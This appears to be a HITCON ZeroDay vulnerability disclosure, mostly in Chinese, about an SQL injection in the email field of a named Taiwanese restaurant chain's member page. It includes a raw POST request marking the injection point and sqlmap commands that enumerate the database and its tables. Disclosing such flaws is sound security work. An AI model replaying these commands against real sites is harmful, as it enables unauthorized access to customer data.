Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00021
- Vendor: 舒果新米蘭蔬食
- Title: 舒果新米蘭蔬食資料庫注入漏洞
- Introduction: 一個很明顯的 boolean/time based SQLi
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2016/01/28 13:10:51 : 新提交 (由 [email protected] 更新此狀態)
- 2016/02/01 02:51:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/02/05 17:14:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/02/05 17:15:06 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/02/01 00:00:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/15 18:47:41 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/15 18:52:51 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
詳細資料
- ZDID:ZD-2016-00021
- 通報者:chris ([email protected])
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
敘述
漏洞位置: 當當會員 > 補發會員確認信函
網頁請求:
POST /member_reissue.aspx HTTP/1.1
Host: www.sufood.com.tw
Content-Length: 260
Content-Type: application/x-www-form-urlencoded
Connection: close
VIEWSTATE=%2FwEPDwULLTE3MDM3NjYyODZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJbWFnZUJ1dHRvbjFpxpOHBKlK13n6kDkiv6jsVAay1A%3D%3D&EVENTVALIDATION=%2FwEWAwKXmMbCDAKyzcaDDQLSwpnTCDzeQ7otwPbF0lqqLwuCteDF9dyr&email=SQLi_HERE&ImageButton1.x=115&ImageButton1.y=49
網頁回應:
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 27 Jan 2016 06:33:52 GMT
Connection: close
Content-Length: 146
<script language=javascript>alert('您輸入的帳號為無效之會員帳號,請確認,謝謝');location.href='member_reissue.aspx';</script>
測試語法:
sqlmap -r SQLi.txt -p "email" -o -v 0 --flush-session --random-agent --threads 10 --banner --current-db --current-user --is-dba
sqlmap -r SQLi.txt -p "email" -o -v 0 --flush-session -D "Wang2SMS" --tables